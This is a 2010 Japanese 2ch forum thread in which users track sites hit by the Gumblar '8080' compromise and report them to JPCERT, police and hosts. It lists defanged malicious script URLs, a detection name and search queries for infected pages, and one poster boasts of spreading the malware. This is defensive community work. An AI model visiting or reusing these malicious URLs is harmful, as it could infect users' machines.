739:名無しさん@お腹いっぱい。
10/06/14 20:07:54
>>730
お前いいかげん、うぜえよ
740:名無しさん@お腹いっぱい。
10/06/15 00:41:08
複数サイト管理してるんだが、そのうち1つが改竄されてた。
で、その鯖缶のサイトトップが改竄されてたようなんだが、これは自分は感染してないと見てOK?
741:名無しさん@お腹いっぱい。
10/06/15 01:34:21
>>740
とりあえずスキャンしろ
742:夷塚 ◆y0JEaK6O/gDf
10/06/15 02:43:36
コテは好きじゃないけど仕方ないか…
>>740
不安に思ったら迷わずスキャンしたほうがいいですよ
それほど手間の掛かる作業でもありませんしね
>>735
メル凸しておきましたと事後報告
Gredで覗いた限りでは綺麗になってますね
>>738
メル凸しました
ついでにJPCERTに報告、Aviraに検体提出済み
743:名無しさん@お腹いっぱい。
10/06/15 08:13:56
www●kobesaito●com
これも8080系
744:名無しさん@お腹いっぱい。
10/06/15 10:31:30
そういや最近のGumblerだと対策せず感染したページ見たらウイルスをなすりつけてくるページに飛ばされるのかな?
それともウイルス自体埋め込みだから「感染した!」って解らない?
後者なら恐ろし過ぎるな、普段見てるページすら安心して出歩けないじゃん
過去ログ見る限りレジストリまで弄らないと対策不十分とまで言われるみたいだし
そこまで徹底しないとダメなんじゃあ今も感染が広がるのも納得
745:名無しさん@お腹いっぱい。
10/06/15 10:47:41
>>727
検索して飛んだサイトから
そのドメインにリダイレクトされてびびったわ
FWでブロックしてたから接続されなかったけど
746:夷塚 ◆y0JEaK6O/gDf
10/06/15 11:47:50
>>743
さくらインターネット、JPCERTに報告しました
747:名無しさん@お腹いっぱい。
10/06/15 13:22:45
>>744
> そういや最近のGumblerだと対策せず感染したページ見たらウイルスをなすりつけてくるページに飛ばされるのかな?
前のを知ってるならレス見てればわかると思うけど変わってないよ
レジストリまで確認しなきゃいけないのは稀な例で一般的にはそこまで必要ない
だいたいハンパなJREが入っていることの方が多い
サイト管理者が感染しても仕方ないという理由にはならないね
748:名無しさん@お腹いっぱい。
10/06/15 13:53:13
artsplanet●biz
com:8080な件
749:名無しさん@お腹いっぱい。
10/06/15 14:54:55
>>747
そのJREがコンパネで消しただけじゃダメだからアレなんじゃないの?
感染するのはホームページ持ってるユーザーだけじゃないし、
一般人にはコンパネで消した後も残骸が残ってる、しかも残ってる場所が1つの誤削除でPC動かなくなるかもしれないレジストリなんて予想だにせんよ
750:名無しさん@お腹いっぱい。
10/06/15 15:10:59
>>749
一部のメーカー製PCだけプリインストールされてる古いバージョンが消せないってだけで
通常はそんなのないです
751:名無しさん@お腹いっぱい。
10/06/15 15:43:06
GENOにかかってるか不安な奴はここを見てみ
このサイトのカーソルを当ててなくても波紋が出るならアウト
危険なサイトじゃない安心しろ一応
URLリンク(www.geocities.jp)
752:名無しさん@お腹いっぱい。
10/06/15 15:46:01
>>750
通常は、って言ったところで対象にはあるじゃん
プリインストール版はコンパネで消して、見た目は消えてても消した事にならないとか書いてないから被害広がってるところあるんじゃね?
ホントに根絶やしにしたいならそういうところもテンプレ徹底しなくちゃ
753:名無しさん@お腹いっぱい。
10/06/15 16:47:52
んなレアケースのことなんざどうでもいいよ
どうしてもってならお前がテンプレ作れ
754:夷塚 ◆y0JEaK6O/gDf
10/06/15 17:29:42
>>748
さくらインターネット、JPCERTに報告済み
Aviraに検体を提出しました
URLリンク(yamagata.int21h.jp)
こんなツールあったんですね
755:名無しさん@お腹いっぱい。
10/06/15 18:00:20
>>752
自己防衛が目的であって根絶やしなんていう非現実的なものは目標ではないんだけど
テンプレおねがいしますね
756:名無しさん@お腹いっぱい。
10/06/15 19:20:27
>>754
すごいけど、3月から更新無いね
現在のものには無力じゃないかな?
757:コテハン ◆8080adndqg
10/06/15 20:03:40
>>754 乙乙
--
URLリンク(www.google.co.jp)
色々試したけど、まったく釣れない・・orz
758:夷塚 ◆y0JEaK6O/gDf
10/06/16 04:57:20
>>756
サイト構成やリンク先、スクリプトの一覧を一気に把握できるので、
意外と使い方次第かもしれない…とか思ってみたり
>>757
お疲れ様です、検索ワードが苦戦のほどを物語ってますね…
こちらもほぼお手上げ状態、何か良い方法はないものか
759:名無しさん@お腹いっぱい。
10/06/16 07:10:12
bingで検索したほうがいいよ
760:名無しさん@お腹いっぱい。
10/06/16 16:15:55
www■4gamer■net/
4亀やられてる?
761:夷塚 ◆y0JEaK6O/gDf
10/06/16 16:30:27
ウイルス対策ソフトが反応しました?
762:名無しさん@お腹いっぱい。
10/06/16 16:36:25
___
|___ミ⌒ヽペタン
| ⌒)ノ ペタン
._ノ ) ((
| .・∀| ( 嘘ヽ
|__| | ̄ ̄ ̄|
/ > . | |
""""""""""""""""""""
763:名無しさん@お腹いっぱい。
10/06/16 17:10:03
>>760
gredとAguseは無反応
Dan's View Sourceで見る限りあやしいコードは無さそうだけど?
あと、ここは鑑定スレじゃない
764:名無しさん@お腹いっぱい。
10/06/16 19:02:30
じゃあそういう類の鑑定スレがあるのか……と言われるとな
結局Gumblerスレあるのここだけだし
初心者もここにすがるしかないんよね
765:名無しさん@お腹いっぱい。
10/06/16 19:04:17
勇気がなくて踏めないURL鑑定スレin初質 Part41
スレリンク(qa板)
ここでいいじゃん
766:760
10/06/16 21:06:27
>>761-765
8080フィルタが誤爆してただけだった
ホントすみません、4亀さんもすみませんでした
767:名無しさん@お腹いっぱい。
10/06/16 23:16:48
感染の確認方法がないのが痛い。
不安ならアンインストールw
768:名無しさん@お腹いっぱい。
10/06/16 23:51:32
>>767
怪しい確認方法よりスキャンのがはるかに良い
769:名無しさん@お腹いっぱい。
10/06/17 03:33:11
ノートンゴーストで4日前に戻した
これでウィルスなくなってる?
770:名無しさん@お腹いっぱい。
10/06/17 07:34:59
クリーンインスコとか普通なら最終手段なのにな
出現からもうすぐで一年になるのに感染したらこれしかないとか・・・
771:名無しさん@お腹いっぱい。
10/06/17 08:07:27
感染しているかどうかはどこで判断すればいいの?
772:('д') ◆yUyb3Tqn92
10/06/17 08:25:47
>>730
( ´,дゝ`)俺様こそがまさにウィルス貼りまくってる張本人だがなにか文句でも?
まるでこのスレの住人が同罪みたいな言いようだが、正確には共犯者なのだお( ´,дゝ`)ウフ
それにお前のような奴がいるからやめられねぇ「踏ませ」はな('д')v
773:('д') ◆yUyb3Tqn92
10/06/17 08:26:42
>>771
テンプレをよーーく見たまえ
チェックするところ沢山あるから
ニパ('д^)-☆
774:('д') ◆yUyb3Tqn92
10/06/17 08:30:25
特に>>2で探すのが一番確実な方法ですね。
はい。調子に乗り乗りな気分です。
次スレでも同じことをするつもりです。
このスレの削除依頼出した奴、無駄な努力お疲れ。
('д')調子に乗り乗りの気分です('д')
775:名無しさん@お腹いっぱい。
10/06/17 08:52:44
そういやaguseだと何処見れば対象のページがGumbler感染してるって教えてくれるんだろう
Gredは単純に「危険です」で教えてくれるんだろうけど、aguseは見るところ多すぎてゴチャゴチャでワケワカメ
776:('д') ◆yUyb3Tqn92
10/06/17 09:39:15
やべぇえええええ
(*'д'*)最近心がとても穏やかだぜ俺!!
悪意を持って悪をなしてたのに最近は天使のような心で悪をなしているお!!!
('`д´')こ!このままでは!天使になってしまうではないかー!
777:('д') ◆yUyb3Tqn92
10/06/17 09:39:56
さて
新宿VIPクリスタル行ってこよっと( 'д')
778:名無しさん@お腹いっぱい。
10/06/17 09:56:45
>>775
確かにわかりにくいよね
779:名無しさん@お腹いっぱい。
10/06/17 22:35:52
>>771
アンチウィルスソフトにドライブバイダウンロード用のダウンローダが検出されたら
780:名無しさん@お腹いっぱい。
10/06/17 22:39:36
ドライブバイダウンロード用のダウンローダがどこのフォルダに作成されたかが分かればいいのだがなあ
781:名無しさん@お腹いっぱい。
10/06/17 23:11:08
>>775
取得画像の下にGumbler感染してる可能背がありますってでるぞ
782:名無しさん@お腹いっぱい。
10/06/17 23:31:52
>>780
そういうのは一時的にわかったとしても
1時間後には変更されてるかもしれないから意味がない
783:名無しさん@お腹いっぱい。
10/06/18 08:58:32
www.value-2han●com
784:名無しさん@お腹いっぱい。
10/06/18 11:09:59
取扱注意
www●sakaue-farm●co●jp
農業IT化したらウィルス(害虫)にやられてたでござる
785:夷塚 ◆y0JEaK6O/gDf
10/06/18 15:05:55
>>783
www●aguse●jp/?m=w&url=www●value-2han●com
> Trojan.JS.Iframe.mi
> temp●hbsouthmomsclub●com:8080/Website●js
警察庁に通報しました
>>784
www●aguse●jp/?m=w&url=www●sakaue-farm●co●jp
メル凸に反応した様でござる、「403 Forbidden」
[補足]
www●value-2han●com
URLリンク(www.virustotal.com)
(com:8080/.jsを落とせず…aguse判定ではサイト消失っぽい)
↓
zbestfilm●net/media/kal/index●php
URLリンク(www.virustotal.com)
↓
id40478●srvdata●ru/mif●js
URLリンク(www.virustotal.com)
786:名無しさん@お腹いっぱい。
10/06/18 17:08:26
取扱注意
www●dord●co●jp
深海調査のエキスパートねぇ…
787:夷塚 ◆y0JEaK6O/gDf
10/06/18 18:11:54
>>786
よく見つけてきますねえ…
メル凸済み、JPCERTに報告、反応待ち
788:八頭 ◆YAGApwSaEw
10/06/18 22:01:30
>>夷塚さん
お疲れ様
リアルタイムで危険性を痛感している方が指摘する、「オープンなやりとりは危険を伴う」という意見にも頷けるので
僕はここを「無いよりはマシな程度」の存在にすぎないと思ってます(早い話が必要無い派です)
789:夷塚 ◆y0JEaK6O/gDf
10/06/19 05:39:37
>>787は、探すのが面倒なcom:8080を幾つも発掘している事に驚いている、
という意味で書いたのですが、読み返すと日本語おかしいですね
気が緩んでいたかな…申し訳ありません
>>788
まさか八頭氏からご指名とは驚きました
俺は「必要なくなる日が来るといいなあ」以上の事は考えてませんよ
790:名無しさん@お腹いっぱい。
10/06/19 12:16:04
レス削除なかなかされないねぇ
このスレのテンプレ見て踏んで被害者が増えない事を祈るのみ
あと運営仕事しろ
791:コテハン ◆8080adndqg
10/06/19 14:28:12
【陥落サイトのURL悪用厳禁】
www●leclat●net/blog/
792:コテハン ◆8080adndqg
10/06/19 15:03:56
>>789
確かに面倒なのでs・・orz
URLリンク(www.google.co.jp)
+OR+%22Default.js%22+OR+%22Del.icio.us.js%22+OR+%22Finder.js%22+OR+%22Gigahertz.js%22+OR+%22Gnutella.js%22
URLリンク(www.google.co.jp)
Kbps.js%22+OR+%22Kibibyte.js%22+OR+%22Link.js%22+OR+%22Name_Server.js%22+OR+%22Null.js%22+OR+%22OASIS.js%22+OR+%22Open_Source.js%22
URLリンク(www.google.co.jp)
+OR+%22Scrolling.js%22+OR+%22Tag.js%22+OR+%22Telnet.js%22
URLリンク(www.google.co.jp)
Video_Card.js%22+OR+%22Webmaster.js%22+OR+%22Website.js%22+OR+%22Web_Page.js%22+OR+%22XML.js%22+OR+%22Yahoo.js%22
※「長い行ががが」と叱られたから、てきとーなとこで改行してありま。
あきた(から)ねる..
793:夷塚 ◆y0JEaK6O/gDf
10/06/19 17:36:09
>>791
メル凸済み、反応待ち
794:名無しさん@お腹いっぱい。
10/06/19 21:52:23
www●itecjapan●co●jp/js/jQuery●js
末尾のdocument.writeがそうだと思う
795:名無しさん@お腹いっぱい。
10/06/19 22:24:10
www17●ocn●ne●jp/~pss/
796:名無しさん@お腹いっぱい。
10/06/19 22:56:37
www6●ocn●ne●jp/~mikajima/
797:夷塚 ◆y0JEaK6O/gDf
10/06/20 00:00:41
>>794
>>795
JPCERT、IPAに報告しました
>>796
スクリプトが見当たりません…探し方が悪いのかな
798:名無しさん@お腹いっぱい。
10/06/20 00:55:56
>>797
センセイに聞くと
「このサイトはコンピュータに損害を与える可能性があります。」
ソースにそれっぽいのが無いから修正済かも・・
799:名無しさん@お腹いっぱい。
10/06/20 13:55:12
Last-Modified: Sat, 19 Jun 2010 09:10:53 GMT
修正したんだろね。
800:名無しさん@お腹いっぱい。
10/06/21 12:29:07
Flash Playerの脆弱性を悪用、改ざんサイト訪問でウイルス感染の危険
URLリンク(internet.watch.impress.co.jp)
二匹目のドジョウ狙いらしい
801:名無しさん@お腹いっぱい。
10/06/21 20:38:26
スポーツ報知や日刊スポーツの
ttp○//as○sr○impact-ad○jp/hserver/
ってJavaScriptがあやしい・・・
802:名無しさん@お腹いっぱい。
10/06/21 21:45:30
>>801
www.google.co.jp/search?q=%22impact-ad.jp%22
広告のようだけど、あやしいってのは具体的に?
アクセスしてみる限りは、ウェブ改竄の不正コードはない
>>800
国内サイトは十数件ぐらいやられたかんじ
www.google.co.jp/search?lr=lang_ja&q=%22in/yahoo.js%22&num=50
803:名無しさん@お腹いっぱい。
10/06/21 22:01:00
>>802
801だが 1つの記事見てる間にクリック音が何回か鳴って
IE8左上の戻るサイト一覧のところにttp○//as○sr○impact-ad○jp/hserver・・・
があったからどうしたのかと思って
MSEでフルスキャンしたら何もウイルスは見つからなかった
804:名無しさん@お腹いっぱい。
10/06/21 23:26:12
>>803
トラッキングクッキーに反応しただけだと思わr
805:名無しさん@お腹いっぱい。
10/06/22 11:09:45
普段見てるページも感染してるんじゃないかって思って日々aguseで石橋を叩く日々だ
DELLで買った奴だからプリインストール版入ってて、コンパネで消したけど不安だよ
ここには対処法は「削除用外部ソフトウェアインスコでおk」で片づけられてるし……
初見には外部ソフトウェアは怖い
806:名無しさん@お腹いっぱい。
10/06/22 13:27:39
取扱注意
www●akuriru●jp
見た感じは8080っぽくないけど、jsファイルが危険すぎワロタ
Web_Page.js \(^o^)/
807:名無しさん@お腹いっぱい。
10/06/22 16:03:06
Javaを完全にアンインストしたいならJavaRa使えば?
808:名無しさん@お腹いっぱい。
10/06/22 16:49:29
とりあえず砂箱通してウェブ見てるけど
これも絶対じゃないからなぁ
809:名無しさん@お腹いっぱい。
10/06/22 17:17:20
>>805
aguseはスルーもあるよ
810:名無しさん@お腹いっぱい。
10/06/22 17:45:13
Chromeブラウザ、Flashに続いてPDFもプラグイン統合
URLリンク(journal.mycom.co.jp)
関係ないか…
811:名無しさん@お腹いっぱい。
10/06/22 17:49:13
URLリンク(docs.google.com)
これみたいなもんだろ?
812:名無しさん@お腹いっぱい。
10/06/22 17:53:26
>>809
確かgredもスルーするよな、ウイルスの特性上普段見てるサイトが次の日感染してて……なんてこともあり得るわけだから
恐ろしいったらありゃしない
>>807
外部ソフトウェアわざわざ使わなきゃいけないってのが不安なんだよ……
「プリインストールはコンパネで削除だけじゃむだ」と言って理由を聞かれると「レジストリに残骸が~」といつもあいまいに返して、その残骸の詳細はまったく出てこない
813:名無しさん@お腹いっぱい。
10/06/22 17:59:05
>>811
簡易型のリーダーがプラグインとしてインスコされてた。
IEで開くよりは軽い気がする。
814:名無しさん@お腹いっぱい。
10/06/22 18:02:31
>>813
ほうほう、Chrome OSに向けて着々と機能増やしてるね
815:名無しさん@お腹いっぱい。
10/06/22 18:35:31
>>812
そもそもDELLにも残骸残ることが確定なの?
あれはNECの一部だけじゃないの?
相当古い機種じゃなきゃあんな変なプリインストールなくね?
816:名無しさん@お腹いっぱい。
10/06/22 18:46:40
>>815
「残骸が残る」としか過去に言われてないからそこまで解らないんだ
そもそも残骸がどんなのか、どこにあるのか、regedit.exeで見たらどう映るのか
ただ「残骸あるある」だけでそこから先が全く話に出てないから……
817:名無しさん@お腹いっぱい。
10/06/22 18:52:58
>>816
それっぽい単語でレジストリ検索してもでないならどうしようもなくね
そんな見えないもんに震えてないでDELLのサポートにでも聞けばいいんじゃないの
818:名無しさん@お腹いっぱい。
10/06/22 19:03:43
>>817
期限切れた、アンインスコ済み、そもそも「それっぽい単語」ってのも初見にはサッパリ……
過去ログ読んで知ってそうな「残骸あるある」さんのログ見てもホントに「残骸あるよ」「メーカ品は残骸ある」のゴリ押しだけだし……
819:名無しさん@お腹いっぱい。
10/06/22 19:49:34
>>818
javaくらい思いつかないか?
レジストリじゃなくてもとりあえずjava.exeをファイル検索してみる程度はやったの?
調べる気もなく過剰に心配してるだけならPC捨てるのが一番安全だよ
しかもDELLってだけで他の情報は隠蔽されてるから調べようがない
そもそも本当にそれはプリインストールされていたの?
この方法でOS入れなおせば余計なソフトははいらないっぽいけどどうなんだろ
URLリンク(supportapj.dell.com)
820:名無しさん@お腹いっぱい。
10/06/22 21:36:49
スレの過去ログ読んでもググっても解らないからこそ書いてるのに「調べる気もない」「PC捨てれば?」だなんて……
とりあえずjava.exe検索したらwindows\system32とprogramfile\jre6\binに一つずつあった
どっちも作成日時は2010/04/16だった
821:名無しさん@お腹いっぱい。
10/06/22 21:45:36
すいません、検索しなおすとc\i386にも入っていました……
こちらは2005/11/10です
822:名無しさん@お腹いっぱい。
10/06/22 21:48:02
なかようせえへんねんやったらもうピコピコこうたらへんで
823:名無しさん@お腹いっぱい。
10/06/22 21:53:31
>>806
>>792
因みに、akuriru●jpは再発だw
渡辺司法書士はこっそり修正後、告知しないで隠蔽かにゃ?
search●yahoo●co●jp/search?p=%22●com%3A8080%2FWebmaster●js%22&ei=UTF-8&fr=top_ga1_sa&x=wrt&meta=fl%3D3
824:名無しさん@お腹いっぱい。
10/06/22 21:58:21
akuriru●jp
こっそりなおしてる
825:名無しさん@お腹いっぱい。
10/06/23 02:47:36
>>820
以下は通常JREインストールで入るjava.exe
> windows\system32とprogramfile\jre6\bin
java.exeを右クリック→プロパティからバージョンは確認できる
日付も新しいようだしまだこれはインストールされてるんじゃね
c\i386はリカバリ領域かなんかじゃないかと